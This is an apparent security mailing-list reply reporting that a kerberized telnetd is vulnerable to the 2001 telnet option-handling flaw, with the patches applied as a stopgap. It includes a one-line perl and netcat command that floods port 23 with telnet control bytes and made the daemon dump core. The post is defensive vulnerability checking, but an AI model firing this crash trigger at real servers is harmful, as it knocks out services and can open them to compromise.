Yes, it does.
I tested as suggested on FreeBSD security list with the following command
to our kerberized telnetd, and it dumped core.
perl -e '$c=sprintf("%c%c", 255, 246); sleep 10; print $c x1000 . "\r\n"' \
| nc localhost 23
(The nc command is netcat-1.10 from ftp://avian.org/src/hacks/.)
The following patches by kerberos versions were applied to our kerberized
telnetd to temporarily plug the hole:
ftp://ftp.cs.washington.edu/cse/patches/krb5-1.1.1.patch
ftp://ftp.cs.washington.edu/cse/patches/krb5-1.2.2.patch
The patches were derived from an earlier version of FreeBSD patches
before the FreeBSD Security Advisory FreeBSD-SA-01:49.telnetd
(http://docs.freebsd.org/mail/current/freebsd-announce.html) was
issued, so the patches may not be up to date.
---
Voradesh Yenbut Software Engineer, CSE
1 206 685-0912 BOX 352350, U of Washington
[EMAIL PROTECTED] Seattle, WA 98195
> So, most of my machines don't use the standard vendor telnet, but
> instead use one form or another of a kerberized telnet. Does anyone
> know if today's announcement applies to kerberized telnetd's?
>
> http://www.securityfocus.com/bid/3064
>
> --
> John "kzin" Rudd http://people.ucsc.edu/~jrudd
> Truth decays into beauty, while beauty soon becomes merely charm. Charm
> ends up as strangeness, and even that doesn't last. (Physics of Quarks)
> -----===== Kein Mitleid Fu:r MicroSoft (www.kmfms.com) ======-----
>
